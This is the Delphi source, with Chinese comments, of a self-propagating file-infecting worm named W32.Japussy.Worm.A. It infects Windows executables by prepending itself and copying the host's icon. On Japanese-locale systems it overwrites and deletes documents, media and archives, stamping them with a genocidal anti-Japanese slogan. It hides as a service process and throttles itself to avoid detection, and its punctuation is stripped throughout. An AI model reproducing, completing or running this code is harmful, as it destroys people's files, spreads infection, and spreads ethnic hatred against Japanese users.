program Japussy
uses
Windows SysUtils Classes Graphics ShellAPI{ Registry}
const
HeaderSize 82432 病毒体
IconOffset 12EB8 PE文件图标偏移量
Delphi5 SP1面编译版Delphi
查找2800000020十六进制字符串找图标偏移量
{
HeaderSize 38912 Upx压缩病毒体
IconOffset 92BC Upx压缩PE文件图标偏移量
Upx 124W 法 upx 9 8086 Japussyexe
}
IconSize 2E8 PE文件图标744字节
IconTail IconOffset + IconSize PE文件图标尾部
ID 44444444 感染标记
垃圾码备写入
Catchword 'If a race need to be killed out it must be Yamato ' +
'If a country need to be destroyed it must be Japan ' +
'*** W32JapussyWormA ***'
{R *RES}
function RegisterServiceProcess(dwProcessID dwType Integer) Integer
stdcall external 'Kernel32dll' 函数声明
var
TmpFile string
Si STARTUPINFO
Pi PROCESS_INFORMATION
IsJap Boolean False 日文操作系统标记
{ 判断否Win9x }
function IsWin9x Boolean
var
Ver TOSVersionInfo
begin
Result False
VerdwOSVersionInfoSize SizeOf(TOSVersionInfo)
if not GetVersionEx(Ver) then
Exit
if (VerdwPlatformID VER_PLATFORM_WIN32_WINDOWS) then Win9x
Result True
end
{ 流间复制 }
procedure CopyStream(Src TStream sStartPos Integer Dst TStream
dStartPos Integer Count Integer)
var
sCurPos dCurPos Integer
begin
sCurPos SrcPosition
dCurPos DstPosition
SrcSeek(sStartPos 0)
DstSeek(dStartPos 0)
DstCopyFrom(Src Count)
SrcSeek(sCurPos 0)
DstSeek(dCurPos 0)
end
{ 宿文件已感染PE文件中分离出备 }
procedure ExtractFile(FileName string)
var
sStream dStream TFileStream
begin
try
sStream TFileStreamCreate(ParamStr(0) fmOpenRead or fmShareDenyNone)
try
dStream TFileStreamCreate(FileName fmCreate)
try
sStreamSeek(HeaderSize 0) 跳头部病毒部分
dStreamCopyFrom(sStream sStreamSize HeaderSize)
finally
dStreamFree
end
finally
sStreamFree
end
except
end
end
{ 填充STARTUPINFO结构 }
procedure FillStartupInfo(var Si STARTUPINFO State Word)
begin
Sicb SizeOf(Si)
SilpReserved nil
SilpDesktop nil
SilpTitle nil
SidwFlags STARTF_USESHOWWINDOW
SiwShowWindow State
SicbReserved2 0
SilpReserved2 nil
end
{ 发带毒邮件 }
procedure SendMail
begin
位仁兄愿意完成?
end
{ 感染PE文件 }
procedure InfectOneFile(FileName string)
var
HdrStream SrcStream TFileStream
IcoStream DstStream TMemoryStream
iID LongInt
aIcon TIcon
Infected IsPE Boolean
i Integer
Buf array[01] of Char
begin
try 出错文件正退出
if CompareText(FileName 'JAPUSSYEXE') 0 then 感染
Exit
Infected False
IsPE False
SrcStream TFileStreamCreate(FileName fmOpenRead)
try
for i 0 to 108 do 检查PE文件头
begin
SrcStreamSeek(i soFromBeginning)
SrcStreamRead(Buf 2)
if (Buf[0] #80) and (Buf[1] #69) then PE标记
begin
IsPE True PE文件
Break
end
end
SrcStreamSeek(4 soFromEnd) 检查感染标记
SrcStreamRead(iID 4)
if (iID ID) or (SrcStreamSize < 10240) then 太文件感染
Infected True
finally
SrcStreamFree
end
if Infected or (not IsPE) then 果感染PE文件退出
Exit
IcoStream TMemoryStreamCreate
DstStream TMemoryStreamCreate
try
aIcon TIconCreate
try
感染文件图标(744字节)存入流
aIconReleaseHandle
aIconHandle ExtractIcon(HInstance PChar(FileName) 0)
aIconSaveToStream(IcoStream)
finally
aIconFree
end
SrcStream TFileStreamCreate(FileName fmOpenRead)
头文件
HdrStream TFileStreamCreate(ParamStr(0) fmOpenRead or fmShareDenyNone)
try
写入病毒体图标前数
CopyStream(HdrStream 0 DstStream 0 IconOffset)
写入目前程序图标
CopyStream(IcoStream 22 DstStream IconOffset IconSize)
写入病毒体图标病毒体尾部间数
CopyStream(HdrStream IconTail DstStream IconTail HeaderSize IconTail)
写入宿程序
CopyStream(SrcStream 0 DstStream HeaderSize SrcStreamSize)
写入已感染标记
DstStreamSeek(0 2)
iID 44444444
DstStreamWrite(iID 4)
finally
HdrStreamFree
end
finally
SrcStreamFree
IcoStreamFree
DstStreamSaveToFile(FileName) 换宿文件
DstStreamFree
end
except
end
end
{ 目标文件写入垃圾码删 }
procedure SmashFile(FileName string)
var
FileHandle Integer
i Size Mass Max Len Integer
begin
try
SetFileAttributes(PChar(FileName) 0) 掉读属性
FileHandle FileOpen(FileName fmOpenWrite) 开文件
try
Size GetFileSize(FileHandle nil) 文件
i 0
Randomize
Max Random(15) 写入垃圾码机次数
if Max < 5 then
Max 5
Mass Size div Max 间隔块
Len Length(Catchword)
while i < Max do
begin
FileSeek(FileHandle i * Mass 0) 定位
写入垃圾码文件彻底破坏掉
FileWrite(FileHandle Catchword Len)
Inc(i)
end
finally
FileClose(FileHandle) 关闭文件
end
DeleteFile(PChar(FileName)) 删
except
end
end
{ 获写驱动器列表 }
function GetDrives string
var
DiskType Word
D Char
Str string
i Integer
begin
for i 0 to 25 do 遍历26字母
begin
D Chr(i + 65)
Str D + ''
DiskType GetDriveType(PChar(Str))
磁盘网络盘
if (DiskType DRIVE_FIXED) or (DiskType DRIVE_REMOTE) then
Result Result + D
end
end
{ 遍历目录感染摧毁文件 }
procedure LoopFiles(Path Mask string)
var
i Count Integer
Fn Ext string
SubDir TStrings
SearchRec TSearchRec
Msg TMsg
function IsValidDir(SearchRec TSearchRec) Integer
begin
if (SearchRecAttr '') and
(SearchRecName <> '') then
Result 0 目录
else if (SearchRecAttr 16) and (SearchRecName <> '') and
(SearchRecName <> '') then
Result 1 根目录
else Result 2 根目录
end
begin
if (FindFirst(Path + Mask faAnyFile SearchRec) 0) then
begin
repeat
PeekMessage(Msg 0 0 0 PM_REMOVE) 调整消息队列避免引起怀疑
if IsValidDir(SearchRec) 0 then
begin
Fn Path + SearchRecName
Ext UpperCase(ExtractFileExt(Fn))
if (Ext 'EXE') or (Ext 'SCR') then
begin
InfectOneFile(Fn) 感染执行文件
end
else if (Ext 'HTM') or (Ext 'HTML') or (Ext 'ASP') then
begin
感染HTMLASP文件Base64编码病毒写入
感染浏览网页户
位兄弟愿意完成?
end
else if Ext 'WAB' then Outlook址簿文件
begin
获取Outlook邮件址
end
else if Ext 'ADC' then Foxmail址动完成文件
begin
获取Foxmail邮件址
end
else if Ext 'IND' then Foxmail址簿文件
begin
获取Foxmail邮件址
end
else
begin
if IsJap then 倭文操作系统
begin
if (Ext 'DOC') or (Ext 'XLS') or (Ext 'MDB') or
(Ext 'MP3') or (Ext 'RM') or (Ext 'RA') or
(Ext 'WMA') or (Ext 'ZIP') or (Ext 'RAR') or
(Ext 'MPEG') or (Ext 'ASF') or (Ext 'JPG') or
(Ext 'JPEG') or (Ext 'GIF') or (Ext 'SWF') or
(Ext 'PDF') or (Ext 'CHM') or (Ext 'AVI') then
SmashFile(Fn) 摧毁文件
end
end
end
感染删文件睡眠200毫秒避免CPU占率高引起怀疑
Sleep(200)
until (FindNext(SearchRec) <> 0)
end
FindClose(SearchRec)
SubDir TStringListCreate
if (FindFirst(Path + '**' faDirectory SearchRec) 0) then
begin
repeat
if IsValidDir(SearchRec) 1 then
SubDirAdd(SearchRecName)
until (FindNext(SearchRec) <> 0)
end
FindClose(SearchRec)
Count SubDirCount 1
for i 0 to Count do
LoopFiles(Path + SubDirStrings + '' Mask)
FreeAndNil(SubDir)
end
{ 遍历磁盘文件 }
procedure InfectFiles
var
DriverList string
i Len Integer
begin
if GetACP 932 then 日文操作系统
IsJap True 死吧
DriverList GetDrives 写磁盘列表
Len Length(DriverList)
while True do 死循环
begin
for i Len downto 1 do 遍历磁盘驱动器
LoopFiles(DriverList + '' '**') 感染
SendMail 发带毒邮件
Sleep(1000 * 60 * 5) 睡眠5分钟
end
end
{ 程序开始 }
begin
if IsWin9x then Win9x
RegisterServiceProcess(GetCurrentProcessID 1) 注册服务进程
else WinNT
begin
远程线程映射Explorer进程
位兄台愿意完成?
end
果原始病毒体
if CompareText(ExtractFileName(ParamStr(0)) 'Japussyexe') 0 then
InfectFiles 感染发邮件
else 已寄生宿程序开始工作
begin
TmpFile ParamStr(0) 创建时文件
Delete(TmpFile Length(TmpFile) 4 4)
TmpFile TmpFile + #32 + 'exe' 真正宿文件空格
ExtractFile(TmpFile) 分离
FillStartupInfo(Si SW_SHOWDEFAULT)
CreateProcess(PChar(TmpFile) PChar(TmpFile) nil nil True
0 nil '' Si Pi) 创建新进程运行
InfectFiles 感染发邮件
end
end